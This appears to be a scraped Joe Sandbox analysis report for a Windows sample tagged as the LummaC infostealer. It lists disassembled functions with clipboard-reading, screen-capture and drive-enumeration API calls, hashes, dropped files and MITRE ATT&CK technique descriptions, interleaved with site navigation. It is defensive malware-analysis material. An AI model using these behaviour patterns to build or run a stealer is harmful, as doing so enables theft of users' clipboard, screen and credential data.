Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E

Function 02111C3E Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C

Function 004367F0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436804
GetClipboardData.USER32 ref: 0043681F
GlobalLock.KERNEL32 ref: 00436838
GetWindowLongW.USER32 ref: 0043689D
GlobalUnlock.KERNEL32 ref: 00436959
CloseClipboard.USER32 ref: 00436962

Strings

N, xrefs: 004368C2
@, xrefs: 004368EA
E, xrefs: 004368B3
O, xrefs: 004368CC
K, xrefs: 004368E5
t, xrefs: 004368D6
F, xrefs: 004368E0
C, xrefs: 004368B8
}, xrefs: 004368D1
B, xrefs: 004368C7
{, xrefs: 004368BD

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB

Function 02106A57 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02106A6B
GetClipboardData.USER32 ref: 02106A86
GlobalLock.KERNEL32 ref: 02106A9F
GetWindowLongW.USER32 ref: 02106B04
GlobalUnlock.KERNEL32 ref: 02106BC0
CloseClipboard.USER32 ref: 02106BC9

Strings

C, xrefs: 02106B1F
N, xrefs: 02106B29
O, xrefs: 02106B33
}, xrefs: 02106B38
F, xrefs: 02106B47
@, xrefs: 02106B51
E, xrefs: 02106B1A
K, xrefs: 02106B4C
B, xrefs: 02106B2E
{, xrefs: 02106B24
t, xrefs: 02106B3D

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction ID: 370d0b9feaea87a031c56592c3b50becf227181c5985511f4cfbab9402589fe1
Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction Fuzzy Hash: 74417BB050C3818ED311EF78948835FBFE1AB86318F05496DE4D987292D3B9C589CBA7

Function 020F55CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 020F572D

Strings

:@&F, xrefs: 020F55FA
,X*^, xrefs: 020F560A
C`<f, xrefs: 020F563A
1D6Z, xrefs: 020F5602
%\)R, xrefs: 020F5612
.T'j, xrefs: 020F5622
?P:V, xrefs: 020F561A

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: DrivesLogical
String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
API String ID: 999431828-351939610
Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction ID: 913738c976af3b0eb8989c559263a37c12429031086c75ab3f560f8e19b9842b
Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction Fuzzy Hash: 12310BB41493408FC350CF29C86122BBBF2FFC1714F40981CE6964BB20E7799946DB42

Function 02106BE7 Relevance: 12.1, APIs: 8, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02106BF0
GetCurrentObject.GDI32(00000000,00000007), ref: 02106C11
GetObjectW.GDI32(00000000,00000018,?), ref: 02106C21
DeleteObject.GDI32(00000000), ref: 02106C28
CreateCompatibleDC.GDI32(00000000), ref: 02106C37
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02106C42
SelectObject.GDI32(00000000,00000000), ref: 02106C4E
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02106C71

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
String ID:
API String ID: 2843486406-0
Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction ID: 6ec5dfab517e92d8b4851e384a1fe10c1de1a7a4de77f2a7ce6a891392c7ac3c
Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction Fuzzy Hash: 99214FB9544310EFE3509F609D49B2B7BF8EB8AB11F014929FA5AA2290D77498048B67

Function 020F5367 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 020F5411

Strings

+$e, xrefs: 020F53CC, 020F53E1
+$e, xrefs: 020F5459
E#G, xrefs: 020F53A1
XY, xrefs: 020F53AD

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$XY$E#G
API String ID: 237503144-1023387988
Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction ID: 397f07126f8ec2be37e1f35cf7f9495ac2c6f7c3ace91f5d2b893f537645fb1c
Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction Fuzzy Hash: 6A21F73424C344AFD3548F65D88175FBBE0EBC5714F25C92CE5A857282D775C80A8B86

Function 020F5A47 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 020F5B5B

Strings

rp, xrefs: 020F5A9B
B"@, xrefs: 020F5A7F
`J/H, xrefs: 020F5A8D

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$`J/H$rp
API String ID: 237503144-3817236508
Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction ID: d74b66200cb07009da4e0cbc4c66314be75be032cf330f7c790df93f958aff76
Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction Fuzzy Hash: 3331CDB0E443489FDB10CFA9D8827DEBBB2EF45700F50002CE441BB295D6B55906CFA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fuk7RfLrD3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_D1F3.tmp.exe_c9b51b306e269a2d60d22f619522ab83cfa7b7ac_ff7131e3_48165114-a1e0-4707-a704-69c7940d5838\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCDEC.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD30E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD35D.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
fuk7RfLrD3.exe

Function 00670110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Function 006F977E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0044DF40 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 261
timelibraryCOMMON

Function 00670420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Function 006705B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Function 0044DC40 Relevance: 4.6, APIs: 3, Instructions: 60
librarymemoryloaderCOMMON

Function 004036EC Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 006F943D Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre